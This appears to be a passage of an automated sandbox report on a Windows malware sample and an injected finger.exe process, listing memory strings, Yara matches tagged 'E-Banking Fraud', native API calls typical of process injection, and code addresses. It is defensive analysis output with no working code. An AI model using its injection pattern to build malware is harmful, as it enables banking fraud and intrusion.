                Source: finger.exe, 00000008.00000002.3269614249.0000000002B99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: finger.exe, 00000008.00000002.3271932261.0000000004502000.00000004.10000000.00040000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.0000000003682000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://use.typekit.net/bag0psx.css
                Source: finger.exe, 00000008.00000003.2120902367.0000000007A78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: finger.exe, 00000008.00000003.2120902367.0000000007A78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.0000000003682000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hosttech.ch

                E-Banking Fraud

                barindex
                Source: Yara matchFile source: 6.2.72STaC6BmljfbIQ.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.72STaC6BmljfbIQ.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.3268946749.0000000002AB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3268484619.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.1924713892.00000000010C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.1924159868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3270119796.0000000000820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3269214362.0000000002B00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.1926555511.00000000014A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3269604587.00000000023E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0042C743 NtClose,6_2_0042C743
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011C2B60 NtClose,LdrInitializeThunk,6_2_011C2B60
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011C2DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_011C2DF0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011C2C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_011C2C70
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011C35C0 NtCreateMutant,LdrInitializeThunk,6_2_011C35C0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011C4340 NtSetContextThread,6_2_011C4340
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011C4650 NtSuspendThread,6_2_011C4650
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011C2B80 NtQueryInformationFile,6_2_011C2B80
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011C2BA0 NtEnumerateValueKey,6_2_011C2BA0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011C2BF0 NtAllocateVirtualMemory,6_2_011C2BF0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011C2BE0 NtQueryValueKey,6_2_011C2BE0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011C2AB0 NtWaitForSingleObject,6_2_011C2AB0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011C2AD0 NtReadFile,6_2_011C2AD0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011C2AF0 NtWriteFile,6_2_011C2AF0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011C2D10 NtMapViewOfSection,6_2_011C2D10
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011C2D00 NtSetInformationFile,6_2_011C2D00
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011C2D30 NtUnmapViewOfSection,6_2_011C2D30
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011C2DB0 NtEnumerateKey,6_2_011C2DB0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011C2DD0 NtDelayExecution,6_2_011C2DD0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011C2C00 NtQueryInformationProcess,6_2_011C2C00
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011C2C60 NtCreateKey,6_2_011C2C60
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011C2CA0 NtQueryInformationToken,6_2_011C2CA0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011C2CC0 NtQueryVirtualMemory,6_2_011C2CC0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011C2CF0 NtOpenProcess,6_2_011C2CF0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011C2F30 NtCreateSection,6_2_011C2F30
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011C2F60 NtCreateProcessEx,6_2_011C2F60
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011C2F90 NtProtectVirtualMemory,6_2_011C2F90
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011C2FB0 NtResumeThread,6_2_011C2FB0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011C2FA0 NtQuerySection,6_2_011C2FA0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011C2FE0 NtCreateFile,6_2_011C2FE0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011C2E30 NtWriteVirtualMemory,6_2_011C2E30
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011C2E80 NtReadVirtualMemory,6_2_011C2E80
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011C2EA0 NtAdjustPrivilegesToken,6_2_011C2EA0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011C2EE0 NtQueueApcThread,6_2_011C2EE0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011C3010 NtOpenDirectoryObject,6_2_011C3010
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011C3090 NtSetValueKey,6_2_011C3090
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011C39B0 NtGetContextThread,6_2_011C39B0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011C3D10 NtOpenProcessToken,6_2_011C3D10
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011C3D70 NtOpenThread,6_2_011C3D70
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_03024340 NtSetContextThread,LdrInitializeThunk,8_2_03024340
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_03024650 NtSuspendThread,LdrInitializeThunk,8_2_03024650
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_03022B60 NtClose,LdrInitializeThunk,8_2_03022B60
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_03022BA0 NtEnumerateValueKey,LdrInitializeThunk,8_2_03022BA0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_03022BE0 NtQueryValueKey,LdrInitializeThunk,8_2_03022BE0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_03022BF0 NtAllocateVirtualMemory,LdrInitializeThunk,8_2_03022BF0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_03022AD0 NtReadFile,LdrInitializeThunk,8_2_03022AD0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_03022AF0 NtWriteFile,LdrInitializeThunk,8_2_03022AF0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_03022F30 NtCreateSection,LdrInitializeThunk,8_2_03022F30
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_03022FB0 NtResumeThread,LdrInitializeThunk,8_2_03022FB0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_03022FE0 NtCreateFile,LdrInitializeThunk,8_2_03022FE0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_03022E80 NtReadVirtualMemory,LdrInitializeThunk,8_2_03022E80
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_03022EE0 NtQueueApcThread,LdrInitializeThunk,8_2_03022EE0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_03022D10 NtMapViewOfSection,LdrInitializeThunk,8_2_03022D10
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_03022D30 NtUnmapViewOfSection,LdrInitializeThunk,8_2_03022D30
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_03022DD0 NtDelayExecution,LdrInitializeThunk,8_2_03022DD0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_03022DF0 NtQuerySystemInformation,LdrInitializeThunk,8_2_03022DF0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_03022C60 NtCreateKey,LdrInitializeThunk,8_2_03022C60
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_03022C70 NtFreeVirtualMemory,LdrInitializeThunk,8_2_03022C70
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_03022CA0 NtQueryInformationToken,LdrInitializeThunk,8_2_03022CA0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_030235C0 NtCreateMutant,LdrInitializeThunk,8_2_030235C0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_030239B0 NtGetContextThread,LdrInitializeThunk,8_2_030239B0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_03022B80 NtQueryInformationFile,8_2_03022B80
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_03022AB0 NtWaitForSingleObject,8_2_03022AB0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_03022F60 NtCreateProcessEx,8_2_03022F60
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_03022F90 NtProtectVirtualMemory,8_2_03022F90
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_03022FA0 NtQuerySection,8_2_03022FA0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_03022E30 NtWriteVirtualMemory,8_2_03022E30
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_03022EA0 NtAdjustPrivilegesToken,8_2_03022EA0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_03022D00 NtSetInformationFile,8_2_03022D00
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_03022DB0 NtEnumerateKey,8_2_03022DB0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_03022C00 NtQueryInformationProcess,8_2_03022C00
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_03022CC0 NtQueryVirtualMemory,8_2_03022CC0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_03022CF0 NtOpenProcess,8_2_03022CF0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_03023010 NtOpenDirectoryObject,8_2_03023010
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_03023090 NtSetValueKey,8_2_03023090
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_03023D10 NtOpenProcessToken,8_2_03023D10
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_03023D70 NtOpenThread,8_2_03023D70
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_00619340 NtCreateFile,8_2_00619340
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_006194A0 NtReadFile,8_2_006194A0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_00619590 NtDeleteFile,8_2_00619590
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_00619630 NtClose,8_2_00619630
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_00619790 NtAllocateVirtualMemory,8_2_00619790
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 0_2_0277DF140_2_0277DF14
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 0_2_04DC00400_2_04DC0040
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 0_2_04DC00070_2_04DC0007
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 0_2_04DCAD980_2_04DCAD98
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 0_2_04DCAD970_2_04DCAD97
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 0_2_059611400_2_05961140
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 0_2_059611300_2_05961130
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 0_2_06D59FC00_2_06D59FC0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 0_2_06D55CE00_2_06D55CE0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 0_2_06D544A00_2_06D544A0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 0_2_06D53C300_2_06D53C30
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 0_2_06D53BFC0_2_06D53BFC
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 0_2_06D558970_2_06D55897
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 0_2_06D558A80_2_06D558A8
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 0_2_06D540680_2_06D54068
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_004186736_2_00418673
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_004100F36_2_004100F3
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0040E0FB6_2_0040E0FB
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_004168836_2_00416883
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0040E1036_2_0040E103
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_004029C86_2_004029C8
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_004021836_2_00402183
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_004021906_2_00402190
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0040E2496_2_0040E249
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0040E2536_2_0040E253
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_004023416_2_00402341
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_004023506_2_00402350
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_00402C836_2_00402C83
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0042ED336_2_0042ED33
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0040FED36_2_0040FED3
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_00402E906_2_00402E90
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011801006_2_01180100
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0122A1186_2_0122A118
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_012181586_2_01218158
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_012501AA6_2_012501AA
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_012481CC6_2_012481CC
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_012220006_2_01222000
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0124A3526_2_0124A352
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_012503E66_2_012503E6
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0119E3F06_2_0119E3F0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_012302746_2_01230274
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_012102C06_2_012102C0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011905356_2_01190535
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_012505916_2_01250591
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_012424466_2_01242446
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0123E4F66_2_0123E4F6
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011B47506_2_011B4750
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011907706_2_01190770
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0118C7C06_2_0118C7C0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011AC6E06_2_011AC6E0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011A69626_2_011A6962
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0125A9A66_2_0125A9A6
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011929A06_2_011929A0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0119A8406_2_0119A840
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011928406_2_01192840
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011768B86_2_011768B8
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011BE8F06_2_011BE8F0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0124AB406_2_0124AB40
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01246BD76_2_01246BD7
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0118EA806_2_0118EA80
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0119AD006_2_0119AD00
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0122CD1F6_2_0122CD1F
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011A8DBF6_2_011A8DBF
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0118ADE06_2_0118ADE0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01190C006_2_01190C00
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01230CB56_2_01230CB5
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01180CF26_2_01180CF2
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011B0F306_2_011B0F30
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011D2F286_2_011D2F28
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01204F406_2_01204F40
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0120EFA06_2_0120EFA0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01182FC86_2_01182FC8
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0119CFE06_2_0119CFE0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0124EE266_2_0124EE26
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01190E596_2_01190E59
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011A2E906_2_011A2E90
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0124CE936_2_0124CE93
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0124EEDB6_2_0124EEDB
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0125B16B6_2_0125B16B
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0117F1726_2_0117F172
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011C516C6_2_011C516C
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0119B1B06_2_0119B1B0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0124F0E06_2_0124F0E0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_012470E96_2_012470E9
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011970C06_2_011970C0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0123F0CC6_2_0123F0CC
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0124132D6_2_0124132D
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0117D34C6_2_0117D34C
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011D739A6_2_011D739A
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011952A06_2_011952A0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_012312ED6_2_012312ED
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011AB2C06_2_011AB2C0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_012475716_2_01247571
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0122D5B06_2_0122D5B0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0124F43F6_2_0124F43F
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011814606_2_01181460
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0124F7B06_2_0124F7B0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_012416CC6_2_012416CC
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_012259106_2_01225910
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011999506_2_01199950
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011AB9506_2_011AB950
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011FD8006_2_011FD800
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011938E06_2_011938E0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0124FB766_2_0124FB76
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011AFB806_2_011AFB80
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01205BF06_2_01205BF0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011CDBF96_2_011CDBF9
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01203A6C6_2_01203A6C
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01247A466_2_01247A46
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0124FA496_2_0124FA49
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01231AA36_2_01231AA3
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0122DAAC6_2_0122DAAC
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011D5AA06_2_011D5AA0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0123DAC66_2_0123DAC6
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01247D736_2_01247D73
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01193D406_2_01193D40
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01241D5A6_2_01241D5A
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011AFDC06_2_011AFDC0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01209C326_2_01209C32
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0124FCF26_2_0124FCF2
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0124FF096_2_0124FF09
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01191F926_2_01191F92
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0124FFB16_2_0124FFB1
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01199EB06_2_01199EB0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_030AA3528_2_030AA352
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_030B03E68_2_030B03E6
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_02FFE3F08_2_02FFE3F0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_030902748_2_03090274
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_030702C08_2_030702C0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_0308A1188_2_0308A118
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_030781588_2_03078158
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_030B01AA8_2_030B01AA
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_030A41A28_2_030A41A2
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_030A81CC8_2_030A81CC
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_030820008_2_03082000
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_02FE01008_2_02FE0100
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_030147508_2_03014750
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_02FEC7C08_2_02FEC7C0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_02FF07708_2_02FF0770
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_0300C6E08_2_0300C6E0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_030B05918_2_030B0591
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_030944208_2_03094420
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_030A24468_2_030A2446
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_02FF05358_2_02FF0535
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_0309E4F68_2_0309E4F6
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_030AAB408_2_030AAB40
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_02FEEA808_2_02FEEA80
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_030A6BD78_2_030A6BD7
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_02FD68B88_2_02FD68B8
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_030069628_2_03006962
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_030BA9A68_2_030BA9A6
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_02FF28408_2_02FF2840
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_02FFA8408_2_02FFA840
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_02FF29A08_2_02FF29A0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_0301E8F08_2_0301E8F0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_03032F288_2_03032F28
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_03010F308_2_03010F30
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_03092F308_2_03092F30
